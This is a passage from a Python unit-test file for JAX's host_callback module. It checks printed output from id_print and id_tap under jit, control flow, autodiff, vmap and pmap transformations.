assertMultiLineStrippedEqual(self, """
42""", testing_stream.output)
def test_tap_jit_sequence1(self):
def func(x):
x1 = hcb.id_print(x, where="1", output_stream=testing_stream)
return hcb.id_print(x1 + 1, where="2", output_stream=testing_stream)
logging.info("%s: %s", self._testMethodName,
jax.make_jaxpr(func)(1))
logging.info("%s: %s", self._testMethodName,
jax.xla_computation(func, backend='cpu')(1).as_hlo_text())
self.assertEqual(2, jax.jit(func)(1))
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
where: 1
1
where: 2
2""", testing_stream.output)
def test_tap_jit2(self):
"""A sequence of JIT."""
def func(x):
x1 = hcb.id_print(x, where="1", output_stream=testing_stream)
x2 = hcb.id_print(x1 + 1, where="2", output_stream=testing_stream)
return x2
self.assertEqual(2, jax.jit(func)(1))
self.assertEqual(11, jax.jit(func)(10))
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
where: 1
1
where: 2
2
where: 1
10
where: 2
11""", testing_stream.output)
def test_tap_jit_result_unused(self):
"""We can id_print even if we don't use the result."""
def func(x):
hcb.id_print(x, where="1", output_stream=testing_stream)
hcb.id_print(x + 1, where="2", output_stream=testing_stream)
return x + 1
self.assertEqual(2, jax.jit(func)(1))
self.assertEqual(11, jax.jit(func)(10))
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
where: 1
1
where: 2
2
where: 1
10
where: 2
11""", testing_stream.output)
def test_tap_jit_nested(self):
def func(x):
x1 = hcb.id_print(x, where="1", output_stream=testing_stream)
def func_nested(x):
x2 = hcb.id_print(x + 1, where="nested", output_stream=testing_stream)
return x2
x3 = jax.jit(func_nested)(x1)
return hcb.id_print(x3 + 1, where="3", output_stream=testing_stream)
self.assertEqual(3, jax.jit(func)(1))
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
where: 1
1
where: nested
2
where: 3
3""", testing_stream.output)
def test_tap_jit_devices(self):
"""Running on multiple devices."""
logging.info("%s: has devices %s", self._testMethodName, local_devices())
def func(x, device_id):
x1 = hcb.id_print(x, dev=str(device_id), output_stream=testing_stream)
x2 = hcb.id_print(x1 + 1, dev=str(device_id), output_stream=testing_stream)
return x2
for d in local_devices():
self.assertEqual(112, jax.jit(func, device=d, static_argnums=1)(111, d.id))
hcb.barrier_wait()
logging.info("%s: found output %s", self._testMethodName,
testing_stream.output)
self.assertEqual(
len(local_devices()), len(re.findall(r"111", testing_stream.output)))
self.assertEqual(
len(local_devices()), len(re.findall(r"112", testing_stream.output)))
@parameterized.named_parameters(
jtu.cases_from_list(
dict(
testcase_name=f"_with_jit_{with_jit}",
with_jit=with_jit)
for with_jit in [True, False]))
def test_tap_pytree(self, with_jit=False):
def func(x, what=""):
"""Returns some pytrees depending on x"""
if what == "pair_1_x":
return (1, x)
elif what == "pair_x_2x":
return (x, 2 * x)
elif what == "dict":
return dict(a=2 * x, b=3 * x)
else:
assert False
tap_count = 0
def tap_func(a, _, *, what=""):
nonlocal tap_count
tap_count += 1
self.assertEqual(func(5, what), a)
transform = jax.jit if with_jit else lambda f: f
for what in ("pair_1_x", "pair_x_2x", "dict"):
transformed = transform(
lambda x: hcb.id_tap(
partial(tap_func, what=what),
func(x, what),
result=func(x * 2, what))
)(5)
self.assertEqual(func(10, what), transformed)
hcb.barrier_wait() # Wait for receivers to be done
self.assertEqual(3, tap_count)
@parameterized.named_parameters(
jtu.cases_from_list(
dict(
testcase_name=f"_concurrent_{concurrent}",
concurrent=concurrent)
for concurrent in [True, False]))
def test_tap_multiple(self, concurrent=False):
"""Call id_tap multiple times, concurrently or in sequence. """
if concurrent and jtu.device_under_test() in ["cpu", "gpu"]:
# TODO(necula): if there is device side concurrency, outfeeds from
# different computations can be interleaved. For example, it seems that
# on GPU if multiple host threads run a jit computation, the multiple
# computations are interleaved on the GPU. This can result in the outfeed
# trains being interleaved, which will trigger an error.
# The solution is to fix on GPU the receiving logic so that we can outfeed
# the train as one tuple, and receive it one piece as a time. Then the
# trains should be atomic.
# See also b/160692602.
raise SkipTest("concurrent id_tap not supported on CPU, GPU")
received = set()
count = 5
def pause_tap(idx, _):
received.add(int(idx))
logging.info("Starting do_tap %s. Sleeping 1sec ...", idx)
time.sleep(0.3)
logging.info("Finish do_tap %s", idx)
def do_tap(idx):
jax.jit(lambda idx: hcb.id_tap(pause_tap, idx))(idx)
if concurrent:
threads = [
threading.Thread(
name=f"enqueue_tap_{idx}", target=do_tap, args=(idx,))
for idx in range(count)
]
[t.start() for t in threads]
[t.join() for t in threads]
else:
for idx in range(count):
do_tap(idx)
hcb.barrier_wait()
self.assertEqual(received, set(range(count)))
# TODO(necula): see comment for test_multiple_tap. Here we disable also
# on TPU, because the barrier_wait runs on all devices, including on the CPU
# where it would run into concurrency problems.
@skip("Concurrency not supported")
def test_tap_multiple_barriers(self):
"""Call barrier_wait concurrently."""
def pause_tap(*args, **kwargs):
logging.info("pause_tap waiting")
time.sleep(0.3)
logging.info("pause_tap done")
def long_run(x):
return hcb.id_tap(pause_tap, x)
jax.jit(long_run)(5.)
def try_barrier(idx):
logging.info("Starting test barrier %s", idx)
hcb.barrier_wait()
logging.info("Finished test barrier %s", idx)
threads = [
threading.Thread(
name=f"barrier_{idx}", target=try_barrier, args=(idx,))
for idx in range(3)
]
[t.start() for t in threads]
[t.join() for t in threads]
@parameterized.named_parameters(
jtu.cases_from_list(
dict(
testcase_name=f"_with_jit_{with_jit}",
with_jit=with_jit)
for with_jit in [True, False]))
def test_tap_cond(self, with_jit=False):
"""A conditional"""
def func(x):
x1 = hcb.id_print(x, where="1", output_stream=testing_stream)
x2 = hcb.id_print(x1 + 1, where="2", output_stream=testing_stream)
x4 = lax.cond(x % 2 == 0,
lambda x: hcb.id_print(x, where="cond_t",
output_stream=testing_stream),
lambda x: hcb.id_print(-1, where="cond_f", result=x,
output_stream=testing_stream),
x2 + 1)
x5 = hcb.id_print(x4 + 1, where="end", output_stream=testing_stream)
return x5
transform = jax.jit if with_jit else lambda f: f
self.assertEqual(4, transform(func)(1))
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
where: 1
1
where: 2
2
where: cond_f
-1
where: end
4""", testing_stream.output)
@parameterized.named_parameters(
jtu.cases_from_list(
dict(testcase_name=f"_with_jit_{with_jit}",
with_jit=with_jit)
for with_jit in [True, False]))
def test_tap_while_cond(self, with_jit=False):
def func(x):
x1 = hcb.id_print(x, where="1", output_stream=testing_stream)
x2 = hcb.id_print(x1 + 1, where="2", output_stream=testing_stream)
def body(x):
x3 = hcb.id_print(x, where="w_b_1", output_stream=testing_stream)
x4 = lax.cond(x % 2 == 0,
lambda x: hcb.id_print(x, where="w_b_t",
output_stream=testing_stream),
lambda x: hcb.id_print(-1, where="w_b_f",
result=x, output_stream=testing_stream),
x3 + 1)
return hcb.id_print(x4, where="w_b_2", output_stream=testing_stream)
x10 = lax.while_loop(lambda x: x <= 3, body, x2)
res = hcb.id_print(x10, where="end", output_stream=testing_stream)
return res
transform = jax.jit if with_jit else lambda f: f
self.assertEqual(4, transform(func)(1))
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
where: 1
1
where: 2
2
where: w_b_1
2
where: w_b_t
3
where: w_b_2
3
where: w_b_1
3
where: w_b_f
-1
where: w_b_2
4
where: end
4""", testing_stream.output)
def test_tap_jit_while_pred_tap(self):
"""While with printing in the conditional."""
def func(x):
x1 = hcb.id_print(x, where="1")
x10 = lax.while_loop(lambda x: hcb.id_print(x < 3,
where="w_p",
output_stream=testing_stream),
lambda x: hcb.id_print(x + 1, where="w_b",
output_stream=testing_stream),
x1)
res = hcb.id_print(x10, where="3", output_stream=testing_stream)
return res
self.assertEqual(3, jax.jit(func)(1))
hcb.barrier_wait()
assertMultiLineStrippedEqual(self,
"""
where: w_p
True
where: w_b
2
where: w_p
True
where: w_b
3
where: w_p
False
where: 3
3""", testing_stream.output)
@parameterized.named_parameters(
jtu.cases_from_list(
dict(
testcase_name=f"_with_jit_{with_jit}",
with_jit=with_jit)
for with_jit in [True, False]))
def test_tap_scan_cond(self, with_jit=True):
def func(x):
x1 = hcb.id_print(x, where="1", output_stream=testing_stream)
x2 = hcb.id_print(x1 + 1, where="2", output_stream=testing_stream)
def body(c, x):
x3 = hcb.id_print(x, where="s_1", output_stream=testing_stream)
x4 = lax.cond(x % 2 == 0,
lambda x: hcb.id_print(x, where="s_t", output_stream=testing_stream),
lambda x: hcb.id_print(-1, where="s_f", result=x, output_stream=testing_stream),
x3 + 1)
return (c, hcb.id_print(x4, where="s_2", output_stream=testing_stream))
_, x10 = lax.scan(body, x2, jnp.arange(3))
res = hcb.id_print(x10, where="10", output_stream=testing_stream)
return res
if with_jit:
func = jax.jit(func)
res = func(1)
self.assertAllClose(jnp.array([1, 2, 3]), res)
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
where: 1
1
where: 2
2
where: s_1
0
where: s_t
1
where: s_2
1
where: s_1
1
where: s_f
-1
where: s_2
2
where: s_1
2
where: s_t
3
where: s_2
3
where: 10
[1 2 3]""", testing_stream.output)
testing_stream.reset()
@parameterized.named_parameters(
jtu.cases_from_list(
dict(
testcase_name=f"_shape_{shape}_dtype_{np.dtype(dtype).name}_nr_args={nr_args}",
shape=shape,
dtype=dtype,
nr_args=nr_args) for nr_args in [1, 2]
for shape in [(), (2,), (2, 3), (2, 3, 4)]
for dtype in jtu.dtypes.all))
def test_tap_jit_dtypes(self, nr_args=2, dtype=jnp.int16, shape=(2,)):
if dtype in (jnp.complex64, jnp.complex128, jnp.bool_):
raise SkipTest(f"host_callback not implemented for {dtype}.")
if dtype == np.bool_:
args = [self.rng().choice(a=[True, False], size=shape)]
else:
args = [jnp.arange(np.prod(shape), dtype=dtype).reshape(shape)]
if nr_args > 1:
args = args * nr_args
jit_fun1 = jax.jit(lambda xs: hcb.id_print(
xs,
a_new_test="************",
testcase_name=f"shape_{shape}_dtype_{dtype}_nr_args={nr_args}"))
res = jit_fun1(args)
self.assertAllClose(args, res, check_dtypes=True)
def test_tap_jit_large(self):
arg = jnp.arange(10000, dtype=jnp.int32).reshape((10, 10, 5, -1))
jax.jit(hcb.id_print)(arg)
def test_tap_jit_several_together(self):
arg = jnp.arange(50, dtype=jnp.int32).reshape((10, 5))
jax.jit(lambda x, y: hcb.id_print((x, y, x * 2.)))(arg, jnp.ones(100, dtype=jnp.int32))
def test_tap_jit_interleaving(self):
# Several jit's without data dependencies; they may interfere
count = 0 # Count tap invocations
nr_arrays = 5
def tap_func(arg, _):
nonlocal count
assert len(arg) == nr_arrays
count += 1
# This is the function that we'll run multiple times
def func(x, count):
for i in range(count):
x = hcb.id_tap(tap_func, [x + i for i in range(nr_arrays)])[-1]
return x
x = jnp.array(1, dtype=np.int32)
res = 0
for _ in range(10):
# No dependencies between the jit invocations
res += jax.jit(lambda x: func(x, 10))(x)
hcb.barrier_wait()
self.assertEqual(100, count)
def test_tap_jit_tap_exception(self):
if not FLAGS.jax_host_callback_outfeed:
raise SkipTest("TODO: implement error handling for customcall")
# Simulate a tap error
def tap_err(*args, **kwargs):
raise NotImplementedError
def func(x):
x1 = hcb.id_print(x + 1, what="x1", output_stream=testing_stream)
x2 = hcb.id_tap(tap_err, x1 + 1)
x3 = hcb.id_print(x2 + 1, what="x3", output_stream=testing_stream)
return x3
res = jax.jit(func)(0) # No error yet
with self.assertRaises(hcb.CallbackException):
hcb.barrier_wait()
# Even though the receiver thread raised, the main thread should still
# return 3.
self.assertEqual(3, res)
# We should have received all others
assertMultiLineStrippedEqual(self, """
what: x1
1
what: x3
3""", testing_stream.output)
def test_tap_while(self):
"""Executing while, even without JIT uses compiled code"""
y = jnp.ones(5) # captured const
def func(x):
return lax.while_loop(
lambda c: c[1] < 5,
lambda c: (y, hcb.id_print(c[1], output_stream=testing_stream) + 1),
(x, 1))
func(y)
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
1
2
3
4""", testing_stream.output)
def test_tap_jvp(self):
jvp_fun1 = lambda x, xt: jax.jvp(fun1, (x,), (xt,))
res_primals, res_tangents = jvp_fun1(jnp.float32(5.), jnp.float32(0.1))
self.assertAllClose(100., res_primals, check_dtypes=False)
self.assertAllClose(4., res_tangents, check_dtypes=False)
hcb.barrier_wait()
if FLAGS.jax_host_callback_ad_transforms:
assertMultiLineStrippedEqual(self, """
transforms: ['jvp'] what: a * 2
( 10.00 0.20 )
transforms: ['jvp'] what: y * 3
( 30.00 0.60 )""", testing_stream.output)
else:
assertMultiLineStrippedEqual(self, """
what: a * 2
10.00
what: y * 3
30.00""", testing_stream.output)
def test_tap_grad_primal_unused(self):
# The output of id_print is not needed for backwards pass
def func(x):
return 2. * hcb.id_print(x * 3., what="x * 3",
output_stream=testing_stream)
grad_func = jax.grad(func)
arg = jnp.float32(5.)
jaxpr = str(jax.make_jaxpr(grad_func)(arg))
# making the Jaxpr does not print anything
hcb.barrier_wait()
treedef = tree_util.tree_structure(arg)
if FLAGS.jax_host_callback_ad_transforms:
assertMultiLineStrippedEqual(self, f"""
{{ lambda ; a:f32[]. let
b:f32[] = mul a 3.00
c:f32[] = outside_call[
arg_treedef={treedef}
callback=...
identity=True
transforms=()
] b
_:f32[] = mul c 2.00
d:f32[] = mul 1.00 2.00
e:f32[] = outside_call[
arg_treedef={treedef}
callback=...
identity=True
transforms=(('jvp',), ('transpose',))
] d
f:f32[] = mul e 3.00
in (f,) }}""", jaxpr)
else:
assertMultiLineStrippedEqual(self, f"""
{{ lambda ; a:f32[]. let
b:f32[] = mul a 3.00
c:f32[] = outside_call[
arg_treedef={treedef}
callback=...
identity=True
] b
_:f32[] = mul c 2.00
d:f32[] = mul 1.00 2.00
e:f32[] = mul d 3.00
in (e,) }}""", jaxpr)
assertMultiLineStrippedEqual(self, "", testing_stream.output)
testing_stream.reset()
res_grad = grad_func(arg)
hcb.barrier_wait()
self.assertAllClose(6., res_grad, check_dtypes=False)
if FLAGS.jax_host_callback_ad_transforms:
assertMultiLineStrippedEqual(self, """
what: x * 3
15.00
transforms: ['jvp', 'transpose'] what: x * 3
2.00""", testing_stream.output)
else:
assertMultiLineStrippedEqual(self, """
what: x * 3
15.00""", testing_stream.output)
def test_tap_grad_simple(self):
def func(x):
y = hcb.id_print(x * 2., what="x * 2", output_stream=testing_stream)
return x * hcb.id_print(y * 3., what="y * 3",
output_stream=testing_stream)
grad_func = jax.grad(func)
res_grad = grad_func(jnp.float32(5.))
self.assertAllClose(2. * 5. * 6., res_grad, check_dtypes=False)
hcb.barrier_wait()
if FLAGS.jax_host_callback_ad_transforms:
assertMultiLineStrippedEqual(self, """
what: x * 2
10.00
what: y * 3
30.00
transforms: ['jvp', 'transpose'] what: y * 3
5.00
transforms: ['jvp', 'transpose'] what: x * 2
15.00""", testing_stream.output)
else:
assertMultiLineStrippedEqual(self, """
what: x * 2
10.00
what: y * 3
30.00""", testing_stream.output)
def test_tap_grad_grad(self):
def func(x):
y = hcb.id_print(x * 2., what="x * 2", output_stream=testing_stream)
return x * (y * 3.)
grad_func = jax.grad(jax.grad(func))
# making the Jaxpr does not print anything
_ = jax.make_jaxpr(grad_func)(5.)
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, "", testing_stream.output)
res_grad = grad_func(jnp.float32(5.))
self.assertAllClose(12., res_grad, check_dtypes=False)
hcb.barrier_wait()
if FLAGS.jax_host_callback_ad_transforms:
assertMultiLineStrippedEqual(self, """
what: x * 2
10.00
transforms: ['jvp', 'transpose'] what: x * 2
15.00
transforms: ['jvp', 'transpose', 'jvp', 'transpose'] what: x * 2
2.00
transforms: ['jvp', 'transpose'] what: x * 2
3.00""", testing_stream.output)
else:
assertMultiLineStrippedEqual(self, """
what: x * 2
10.00""", testing_stream.output)
def test_tap_grad_pytree(self):
def func(x):
x4, x5 = hcb.id_print((x * 2., x * 3.), what="pair",
result=(x * 4., x * 5.),
output_stream=testing_stream)
return x4 + 2. * x5
x = jnp.float32(5.)
grad_func = jax.grad(func)
print(jax.make_jaxpr(grad_func)(x))
res_grad = grad_func(x)
self.assertAllClose(14., res_grad, check_dtypes=False)
hcb.barrier_wait()
if FLAGS.jax_host_callback_ad_transforms:
assertMultiLineStrippedEqual(self, """
what: pair
( 10.00 15.00 )
transforms: ['jvp', 'transpose'] what: pair
( 0.00 0.00 )""", testing_stream.output)
else:
assertMultiLineStrippedEqual(self, """
what: pair
( 10.00 15.00 )""", testing_stream.output)
def test_tap_jvp_float0(self):
def f(x, yint):
x, yint = hcb.id_tap(lambda arg, _: arg, (x, yint))
return x * yint
res = jax.jvp(f, (2., 3), (0.2, np.zeros((), dtypes.float0)))
self.assertAllClose((6., 0.6), res)
def test_tap_grad_float0(self):
def func(x, yint):
x, yint = hcb.id_print((x, yint), what="pair", output_stream=testing_stream)
return x * yint
grad_func = jax.grad(func)
res_grad = grad_func(jnp.float32(5.), jnp.int32(2))
self.assertAllClose(2., res_grad, check_dtypes=False)
hcb.barrier_wait()
if FLAGS.jax_host_callback_ad_transforms:
assertMultiLineStrippedEqual(self, """
what: pair
( 5.00 2 )
transforms: ['jvp', 'transpose'] what: pair
( 2.00 False )""", testing_stream.output)
else:
assertMultiLineStrippedEqual(self, """
what: pair
( 5.00 2 )""", testing_stream.output)
def test_tap_grad_float0_result(self):
# https://github.com/google/jax/issues/7340
# x is a Tuple[f32[2], s32[3]]
x = (np.array([.7, .8], dtype=np.float32),
np.array([11, 12, 13], dtype=np.int32))
def f_jax(x):
x = hcb.id_print(x, result=x, output_stream=testing_stream) # result= is important
return (3. * x[0], x[1])
def f_jax_vjp(x):
res, pullback = jax.vjp(f_jax, x)
g, = pullback((np.ones(x[0].shape, dtype=x[0].dtype),
np.zeros(x[1].shape, dtype=dtypes.float0)))
return g
g = f_jax_vjp(x)
self.assertAllClose(np.array([3., 3.], dtype=np.float32), g[0])
self.assertEqual(dtypes.float0, g[1].dtype)
hcb.barrier_wait()
if FLAGS.jax_host_callback_ad_transforms:
assertMultiLineStrippedEqual(self, """
( [0.70 0.80] [11 12 13] )
transforms: ['jvp', 'transpose']
( [0.00 0.00] [False False False] )""", testing_stream.output)
else:
assertMultiLineStrippedEqual(self, """
( [0.70 0.80] [11 12 13] )""", testing_stream.output)
def test_tap_higher_order_grad_float0_result(self):
# https://github.com/google/jax/issues/7340
# x is a Tuple[f32[2], s32[3]]
x = (np.array([.7, .8], dtype=np.float32),
np.array([11, 12, 13], dtype=np.int32))
def f_jax(x):
x = hcb.id_print(x, result=x, output_stream=testing_stream) # result= is important
return (jnp.sin(x[0]), x[1])
def wrap_vjp(f, args, res_f_of_args):
# Given a function "f" and "args" return the f_vjp and args_vjp
def make_ct(res):
res_dtype = np.result_type(res)
if res_dtype == dtypes.float0:
return res
ct_dtype = core.primal_dtype_to_tangent_dtype(res_dtype)
return np.ones(np.shape(res), dtype=ct_dtype)
cts = tree_util.tree_map(make_ct, res_f_of_args)
def f_vjp(args, cts):
res, pullback = jax.vjp(f, *args)
return pullback(cts)
return (f_vjp, (args, cts))
res = f_jax(x)
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
( [0.70 0.80] [11 12 13] )""", testing_stream.output)
testing_stream.reset()
# 1st order
f_jax_vjp1, args_vjp1 = wrap_vjp(f_jax, (x,), res)
res_vjp1 = f_jax_vjp1(*args_vjp1)
hcb.barrier_wait()
if FLAGS.jax_host_callback_ad_transforms:
assertMultiLineStrippedEqual(self, """
( [0.70 0.80] [11 12 13] )
transforms: ['jvp', 'transpose']
( [0.00 0.00] [False False False] )""", testing_stream.output)
else:
assertMultiLineStrippedEqual(self, """
( [0.70 0.80] [11 12 13] )""", testing_stream.output)
testing_stream.reset()
# 2nd order
f_jax_vjp2, args_vjp2 = wrap_vjp(f_jax_vjp1, args_vjp1, res_vjp1)
res_vjp2 = f_jax_vjp2(*args_vjp2)
# 3rd order
f_jax_vjp3, args_vjp3 = wrap_vjp(f_jax_vjp2, args_vjp2, res_vjp2)
_ = f_jax_vjp3(*args_vjp3)
def test_tap_vmap(self):
vmap_fun1 = jax.vmap(fun1)
vargs = jnp.array([jnp.float32(4.), jnp.float32(5.)])
vmap_fun1(vargs)
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
transforms: [('batch', {'batch_dims': (0,)})] what: a * 2
[ 8.00 10.00]
transforms: [('batch', {'batch_dims': (0,)})] what: y * 3
[24.00 30.00]""", testing_stream.output)
def test_tap_vmap_not_batched(self):
x = 3.
def func(y):
# x is not mapped, y is mapped
_, y = hcb.id_print((x, y), output_stream=testing_stream)
return x + y
vmap_func = jax.vmap(func)
vargs = jnp.array([jnp.float32(4.), jnp.float32(5.)])
_ = vmap_func(vargs)
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
transforms: [('batch', {'batch_dims': (None, 0)})]
( 3.00 [4.00 5.00] )""", testing_stream.output)
def test_tap_vmap_vmap(self):
# A 2D tensor with x[i, j] = i + j using 2 vmap
def sum(x, y):
return hcb.id_print(x + y, output_stream=testing_stream)
def sum_rows(xv, y):
return jax.vmap(sum, in_axes=(0, None))(xv, y)
def sum_all(xv, yv):
return jax.vmap(sum_rows, in_axes=(None, 0))(xv, yv)
xv = jnp.arange(5, dtype=np.int32)
yv = jnp.arange(3, dtype=np.int32)
# assertMultiLineStrippedEqual(self, "", str(jax.make_jaxpr(sum_all)(xv, yv)))
_ = sum_all(xv, yv)
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
transforms: [('batch', {'batch_dims': (0,)}), ('batch', {'batch_dims': (0,)})]
[[0 1 2 3 4]
[1 2 3 4 5]
[2 3 4 5 6]]""", testing_stream.output)
def test_tap_vmap_while(self):
"""Vmap of while."""
def func(x):
# like max(x, 2)
x1 = hcb.id_print(x, where="before:x", output_stream=testing_stream)
x2 = lax.while_loop(
lambda x: x < 2, lambda x: hcb.id_print(
x + 1, where="body:x+1", output_stream=testing_stream), x1)
res = hcb.id_print(x2, where="after:x", output_stream=testing_stream)
return res
inputs = np.arange(5, dtype=np.int32)
self.assertAllClose(
np.array([2, 2, 2, 3, 4]),
jax.jit(jax.vmap(func))(inputs),
check_dtypes=False)
hcb.barrier_wait()
assertMultiLineStrippedEqual(
self, """
transforms: [('batch', {'batch_dims': (0,)})] where: before:x
[0 1 2 3 4]
transforms: [('batch', {'batch_dims': (0,)})] where: body:x+1
[1 2 3 4 5]
transforms: [('batch', {'batch_dims': (0,)})] where: body:x+1
[2 3 3 4 5]
transforms: [('batch', {'batch_dims': (0,)})] where: after:x
[2 2 2 3 4]""", testing_stream.output)
def test_tap_vmap_while_tap_cond(self):
"""Vmap of while, with a tap in the conditional."""
def func(x):
# like max(x, 2)
x1 = hcb.id_print(x, where="1", output_stream=testing_stream)
x2 = lax.while_loop(lambda x: hcb.id_print(x < 2, where="w_c",
output_stream=testing_stream),
lambda x: hcb.id_print(x + 1, where="w_b",
output_stream=testing_stream),
x1)
res = hcb.id_print(x2, where="3", output_stream=testing_stream)
return res
inputs = np.arange(5, dtype=np.int32)
res = jax.jit(jax.vmap(func))(inputs)
hcb.barrier_wait()
self.assertAllClose(np.array([2, 2, 2, 3, 4]), res, check_dtypes=False)
assertMultiLineStrippedEqual(self, """
transforms: [('batch', {'batch_dims': (0,)})] where: 1
[0 1 2 3 4]
transforms: [('batch', {'batch_dims': (0,)})] where: w_c
[ True True False False False]
transforms: [('batch', {'batch_dims': (0,)})] where: w_b
[1 2 3 4 5]
transforms: [('batch', {'batch_dims': (0,)})] where: w_c
[ True False False False False]
transforms: [('batch', {'batch_dims': (0,)})] where: w_b
[2 3 3 4 5]
transforms: [('batch', {'batch_dims': (0,)})] where: w_c
[False False False False False]
transforms: [('batch', {'batch_dims': (0,)})] where: 3
[2 2 2 3 4]""", testing_stream.output)
def test_tap_transforms_old_doc(self):
if not FLAGS.jax_host_callback_ad_transforms:
raise unittest.SkipTest("disabled for new behavior")
# Examples from the documentation
def power3(x):
y = x * x
# Print both 'x' and 'x^2'. Must pack as a tuple.
_, y = hcb.id_print((x, y), what="x,x^2", output_stream=testing_stream)
return y * x
print(f"impl = {power3(3.)}")
hcb.barrier_wait()
expected = """
what: x,x^2
( 3. 9. )"""
self.assertMultiLineStrippedEqual(expected, testing_stream.output)
testing_stream.reset()
print(f"vmap = {jax.vmap(power3)(np.arange(3.))}")
hcb.barrier_wait()
expected = """
transforms: [('batch', {'batch_dims': (0, 0)})] what: x,x^2
( [0. 1. 2.] [0. 1. 4.] )"""
self.assertMultiLineStrippedEqual(expected, testing_stream.output)
testing_stream.reset()
print(f"jvp = {jax.jvp(power3, (3.,), (0.1,))}")
hcb.barrier_wait()
expected = """
transforms: ['jvp'] what: x,x^2
( ( 3. 9. ) ( 0.1 0.6 ) )"""
self.assertMultiLineStrippedEqual(expected, testing_stream.output)
testing_stream.reset()
print(f"grad = {jax.grad(power3)(3.)}")
hcb.barrier_wait()
expected = """
what: x,x^2
( 3. 9. )
transforms: ['jvp', 'transpose'] what: x,x^2
( 0. 3. )"""
self.assertMultiLineStrippedEqual(expected, testing_stream.output)
testing_stream.reset()
print(f"vmap o grad {jax.vmap(jax.grad(power3))(np.array([2., 3.]))}")
hcb.barrier_wait()
expected = """
transforms: [('batch', {'batch_dims': (0, 0)})] what: x,x^2
( [2. 3.] [4. 9.] )
transforms: ['jvp', 'transpose', ('batch', {'batch_dims': (None, 0)})] what: x,x^2
( 0. [2. 3.] )"""
self.assertMultiLineStrippedEqual(expected, testing_stream.output)
def test_tap_transforms_doc(self):
# Examples from the documentation
if FLAGS.jax_host_callback_ad_transforms:
raise unittest.SkipTest("disabled for old behavior")
def power3(x):
y = x * x
# Print both 'x' and 'x^2'. Must pack as a tuple.
hcb.id_print((x, y), what="x,x^2", output_stream=testing_stream)
return y * x
print(f"impl = {power3(3.)}")
hcb.barrier_wait()
expected = """
what: x,x^2
( 3. 9. )"""
self.assertMultiLineStrippedEqual(expected, testing_stream.output)
testing_stream.reset()
print(f"jvp = {jax.jvp(power3, (3.,), (0.1,))}")
hcb.barrier_wait()
expected = """
what: x,x^2
( 3. 9. )"""
self.assertMultiLineStrippedEqual(expected, testing_stream.output)
testing_stream.reset()
@jax.custom_jvp
def print_tangents(arg):
return None
@print_tangents.defjvp
def print_tangents_jvp(primals, tangents):
arg_dot, = tangents
hcb.id_print(arg_dot, what="tangents", output_stream=testing_stream)
return primals, tangents
def power3_with_tangents(x):
y = x * x
# Print both 'x' and 'x^2'. Must pack as a tuple.
hcb.id_print((x, y), what="x,x^2", output_stream=testing_stream)
print_tangents((x, y))
return y * x
print(f"jvp = {jax.jvp(power3_with_tangents, (3.,), (0.1,))}")
hcb.barrier_wait()
expected = """
what: x,x^2
( 3. 9. )
what: tangents
( 0.1 0.6 )"""
self.assertMultiLineStrippedEqual(expected, testing_stream.output)
testing_stream.reset()
print(f"grad = {jax.grad(power3)(3.)}")
hcb.barrier_wait()
# Only the primals by default
expected = """
what: x,x^2
( 3. 9. )"""
self.assertMultiLineStrippedEqual(expected, testing_stream.output)
testing_stream.reset()
@jax.custom_vjp
def print_cotangents(arg):
# Must return the argument for which we want the cotangent.
return arg
# f_fwd: a -> (b, residual)
def print_cotangents_fwd(arg):
return print_cotangents(arg), None
# f_bwd: (residual, CT b) -> [CT a]
def print_cotangents_bwd(residual, ct_b):
hcb.id_print(ct_b, what="cotangents", output_stream=testing_stream)
return ct_b,
print_cotangents.defvjp(print_cotangents_fwd, print_cotangents_bwd)
def power3_with_cotangents(x):
y = x * x
# Print both 'x' and 'x^2'. Must pack as a tuple.
hcb.id_print((x, y), what="x,x^2", output_stream=testing_stream)
# Must use the output of print_cotangents
(x1, y1) = print_cotangents((x, y))
return y1 * x1
print(f"grad = {jax.grad(power3_with_cotangents)(3.)}")
hcb.barrier_wait()
expected = """
what: x,x^2
( 3. 9. )
what: cotangents
( 9. 3. )"""
self.assertMultiLineStrippedEqual(expected, testing_stream.output)
testing_stream.reset()
# TODO: grad of grad
print(f"vmap = {jax.vmap(power3)(np.array([2., 3.]))}")
hcb.barrier_wait()
expected = """
transforms: [('batch', {'batch_dims': (0, 0)})] what: x,x^2
( [2. 3.] [4. 9.] )"""
self.assertMultiLineStrippedEqual(expected, testing_stream.output)
testing_stream.reset()
print(f"vmap o grad {jax.vmap(jax.grad(power3))(np.array([2., 3.]))}")
hcb.barrier_wait()
expected = """
transforms: [('batch', {'batch_dims': (0, 0)})] what: x,x^2
( [2. 3.] [4. 9.] )"""
self.assertMultiLineStrippedEqual(expected, testing_stream.output)
testing_stream.reset()
print(f"vmap o grad {jax.vmap(jax.grad(power3_with_cotangents))(np.array([2., 3.]))}")
hcb.barrier_wait()
expected = """
transforms: [('batch', {'batch_dims': (0, 0)})] what: x,x^2
( [2. 3.] [4. 9.] )
transforms: [('batch', {'batch_dims': (0, 0)})] what: cotangents
( [4. 9.] [2. 3.] )"""
self.assertMultiLineStrippedEqual(expected, testing_stream.output)
testing_stream.reset()
print(f"grad o remat = {jax.grad(lambda x: power3(ad_checkpoint.checkpoint(power3)(x)))(3.)}")
hcb.barrier_wait()
expected = """
what: x,x^2
( 3. 9. )
what: x,x^2
( 27. 729. )
what: x,x^2
( 3. 9. )"""
self.assertMultiLineStrippedEqual(expected, testing_stream.output)
testing_stream.reset()
def test_tap_pmap(self):
if len(local_devices()) < 2:
raise SkipTest("test requires at least 2 devices")
def power3(x):
y = x * x
# Print both 'x' and 'x^2'. Must pack as a tuple.
_, y = hcb.id_print((x, y),
what="x,x^2",
output_stream=testing_stream,
tap_with_device=True)
return y * x
pmap_power3 = jax.pmap(power3, devices=local_devices())
xv = np.array([3, 4], dtype=np.int32)
res = pmap_power3(xv)
hcb.barrier_wait()
self.assertAllClose(xv * xv * xv, res, check_dtypes=False)
# Assertion text is for 2 devices (also works for 1 device)
